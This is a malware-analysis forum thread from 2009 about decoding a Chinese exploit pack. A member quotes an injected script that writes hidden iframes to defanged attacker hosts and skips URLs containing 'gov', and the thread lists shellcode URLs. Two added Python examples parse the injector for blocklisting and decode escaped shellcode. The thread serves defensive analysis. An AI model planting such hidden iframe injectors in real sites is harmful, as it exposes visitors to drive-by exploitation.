Author Topic: Plz Decode 3 Malicious HTML File From CHINA  (Read 3474 times)


December 15, 2009, 09:29:28 am

kakarot

Hi Hello

I can't decode this htm file :'(

It's a pack from China.

PS. I know mepeg and dj.jpg; it's a mepeg exploit.

thx

/EDITed by SysAdMini

zipped files, password "infected"

December 15, 2009, 10:47:07 am
Reply #1

SysAdMini

dj.jpg: URL in shellcode: hxxp://c1s.count.xj.cn/images/images/js.js
http://www.virustotal.com/analisis/f300a3c2a96ffd163b6802e274f3211f2c4ac2cf9fe9864d10c1ba4d38199e0f-1260873959

mepeg.htm : loads dj.jpg and dj1.jpg

of.htm: loads of.js that isn't included in your collection

ff.htm : loads go.js that isn't included in your collection

bf.htm : requires sfbf.css that isn't included in your collection
Ruining the bad guy's day

December 15, 2009, 02:25:20 pm
Reply #2

MysteryFCM

@kakarot,
Can I ask that you also post the URL you got these from in future, so we can get any missing files ourselves?
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

December 15, 2009, 02:56:19 pm
Reply #3

kakarot

Sorry, my mistake, and thx.

It starts with 1.css:

Code:
// do nothing if the visited page's URL contains "gov"; otherwise inject the loader
if(document.location.href.indexOf("gov")>=0)
{} else {
// hidden container, so the injected frames never show on the page
document.write("<div style='display:none'>")
document.write("<iframe src=hxxp://ican.count.xj.cn/images/images/mepeg.htm></iframe>")
document.write("<iframe src=hxxp://not.count.xj.cn/images/images/tj.htm></iframe>")
document.write("<iframe src=hxxp://stop.count.xj.cn/images/images/ff.htm></iframe>")
document.write("<iframe src=hxxp://loveing.count.xj.cn/images/images/of.htm></iframe>")
document.write("<iframe src=hxxp://you.count.xj.cn/images/images/bf.htm></iframe>")
document.write("</div>")}

hxxp://not.count.xj.cn/images/images/tj.htm has:

Code:
<script language="javascript" src="http://count45.51yes.com/click.aspx?id=457288414&logo=11" charset="gb2312"></script>

http://count45.51yes.com <<--- China web count service

hxxp://you.count.xj.cn/images/images/sfbf.css
sfbf.css <-- VirusTotal -- Result: 0/41 (0.00%) ???
http://www.virustotal.com/analisis/34ecc90fe1af2c6150d1ca8aaec72ff83edf3e0720c01101d4a86691387d175f-1257176016

hxxp://stop.count.xj.cn/images/images/go.js
go.js <-- Virus Total -- Result: 2/41 (4.88%) AVAST : JS:ShellCode-AO ???
http://www.virustotal.com/analisis/3dd5dd4cb27ff9b5ee947da4db77d28aae01f09b127c3452d78095131897d8fc-1260886730

hxxp://loveing.count.xj.cn/images/images/of.js
of.js <-- VirusTotal -- Not Finished
http://www.virustotal.com/analisis/74cc1bf196c40a45185c84ec662545ed9ec99714ca0447910be638511bb4e11d-1260886751

of.js, go.js, sfbf.css inside zip file

thx ;D

MysteryFCM: Changed quote tags to code tags
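The 1.css snippet above is a classic document.write iframe injector: a referrer/URL filter (skip anything with "gov" in the URL), a hidden div, and a row of iframes pointing at the loader pages. The following is an added example for triaging such a snippet, not code from this thread or from any of its posters. It recovers the markup that document.write() would emit, pulls the iframe targets and their hosts, and flags the hidden container and the URL filter. The sample input is the posted 1.css text; the function and variable names (analyze, defang, INJECTED_SCRIPT, and so on) are my own.

```python
import re

# Sample under analysis: the injected 1.css script quoted in this thread, with
# the poster's hxxp defanging left in place.
INJECTED_SCRIPT = r'''
if(document.location.href.indexOf("gov")>=0)
{} else {
document.write("<div style='display:none'>")
document.write("<iframe src=hxxp://ican.count.xj.cn/images/images/mepeg.htm></iframe>")
document.write("<iframe src=hxxp://not.count.xj.cn/images/images/tj.htm></iframe>")
document.write("<iframe src=hxxp://stop.count.xj.cn/images/images/ff.htm></iframe>")
document.write("<iframe src=hxxp://loveing.count.xj.cn/images/images/of.htm></iframe>")
document.write("<iframe src=hxxp://you.count.xj.cn/images/images/bf.htm></iframe>")
document.write("</div>")}
'''

# String literals handed to document.write(); the injected markup only exists
# once these are concatenated, so recover them first.
WRITE_CALL = re.compile(r'document\.write\(\s*"((?:[^"\\]|\\.)*)"\s*\)')
IFRAME_SRC = re.compile(r'<iframe\b[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
HIDDEN_STYLE = re.compile(
    r'display\s*:\s*none|visibility\s*:\s*hidden|(?:width|height)\s*=\s*["\']?0\b', re.I)
# The "gov" check: indexOf(...) >= 0 on the current page URL.
LOCATION_FILTER = re.compile(r'location\.href\.indexOf\(\s*"([^"]+)"\s*\)\s*>=\s*0')
HOST = re.compile(r'^[a-z]+://([^/:?#]+)', re.I)


def defang(url: str) -> str:
    """Render a URL non-clickable (http -> hxxp) before it lands in a report."""
    return re.sub(r'^http', 'hxxp', url, flags=re.I)


def analyze(script: str) -> dict:
    """Summarise a document.write iframe injector for an analyst's notes."""
    written = "".join(m.group(1).replace('\\"', '"') for m in WRITE_CALL.finditer(script))
    urls = [defang(u) for u in IFRAME_SRC.findall(written)]
    hosts = sorted({HOST.match(u).group(1).lower() for u in urls if HOST.match(u)})
    filt = LOCATION_FILTER.search(script)
    report = {
        "iframe_urls": urls,
        "hosts": hosts,
        "hidden_container": bool(HIDDEN_STYLE.search(written)),
        "location_filter": filt.group(1) if filt else None,
    }
    report["verdict"] = ("likely iframe injector"
                         if report["hidden_container"] and urls else "no injector pattern")
    return report


if __name__ == "__main__":
    for key, value in analyze(INJECTED_SCRIPT).items():
        print(f"{key}: {value}")
```

The host list is what goes into a blocklist or a hosts file; the location filter is worth recording too, because a crawler that fetches the page from a URL containing the filtered substring will never see the iframes and will report the page as clean.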

December 23, 2009, 01:56:43 pm
Reply #4

binary

SysAdMini,

I tried to decode the shellcode that was in the dj.jpg file... I believe it was preceded with '|'? I converted it to hex and analyzed it with strings, but didn't find a URL... can you describe how you found one? :-X
There are only 10 kinds of people in this world, those who understand binary and those who don't
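SysAdMini found a URL in the dj.jpg shellcode, while a hex conversion followed by strings did not turn one up. The thread does not say how that shellcode is encoded, so the following is an added example built on an assumption, not code from the thread: it assumes the shellcode is stored as JavaScript-style %uXXXX escapes (the usual form in browser exploit pages) and shows two things that make a plain strings pass miss a URL: the escapes have to be turned into bytes in the right (little-endian) order first, and the URL may be stored as UTF-16LE, which a byte-oriented strings scan with a minimum length never sees. The sample blob, its placeholder URL and all function names (unescape_to_bytes, find_strings, extract_urls, make_sample) are constructed for this example.

```python
import re
import struct

# %uXXXX is a 16-bit code unit (little-endian once in memory); %XX is one byte.
ESCAPE = re.compile(r'%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})')
# Narrow strings: runs of printable ASCII. Wide strings: printable ASCII with
# a NUL after each character, which is how UTF-16LE text looks in a dump.
NARROW = re.compile(rb'[\x20-\x7e]{6,}')
WIDE = re.compile(rb'(?:[\x20-\x7e]\x00){6,}')
URL = re.compile(r'h(?:tt|xx)ps?://[^\s"\'<>]+', re.I)


def unescape_to_bytes(text: str) -> bytes:
    """Turn %uXXXX / %XX escaped shellcode text into the raw bytes it becomes in memory."""
    out = bytearray()
    for m in ESCAPE.finditer(text):
        if m.group(1) is not None:
            out += struct.pack("<H", int(m.group(1), 16))
        else:
            out.append(int(m.group(2), 16))
    return bytes(out)


def find_strings(blob: bytes) -> list:
    """strings-style scan that reports both narrow (ASCII) and wide (UTF-16LE) runs."""
    narrow = [m.group(0).decode("ascii") for m in NARROW.finditer(blob)]
    wide = [m.group(0).decode("utf-16-le") for m in WIDE.finditer(blob)]
    return narrow + wide


def extract_urls(escaped_shellcode: str) -> list:
    """Decode the escapes, scan for strings, and return any URLs found (sorted, deduplicated)."""
    blob = unescape_to_bytes(escaped_shellcode)
    return sorted({u for s in find_strings(blob) for u in URL.findall(s)})


def make_sample() -> str:
    """Constructed stand-in for an escaped shellcode blob; not derived from dj.jpg."""
    url = "hxxp://example.invalid/js.js"  # placeholder, not an indicator from the thread
    # NOP-like filler, the URL as UTF-16LE, a wide NUL terminator, then some trailing bytes.
    raw = b"\x90" * 8 + url.encode("utf-16-le") + b"\x00\x00" + b"\xcc" * 4
    return "".join("%%u%04x" % struct.unpack_from("<H", raw, i)[0]
                   for i in range(0, len(raw), 2))


if __name__ == "__main__":
    sample = make_sample()
    print("narrow strings:", NARROW.findall(unescape_to_bytes(sample)))
    print("urls:", extract_urls(sample))
```

Running it shows the narrow scan returning nothing while the wide scan recovers the URL; the equivalent with the real strings tool is its wide-string option (strings -e l on GNU binutils), run over the decoded bytes rather than over the hex text.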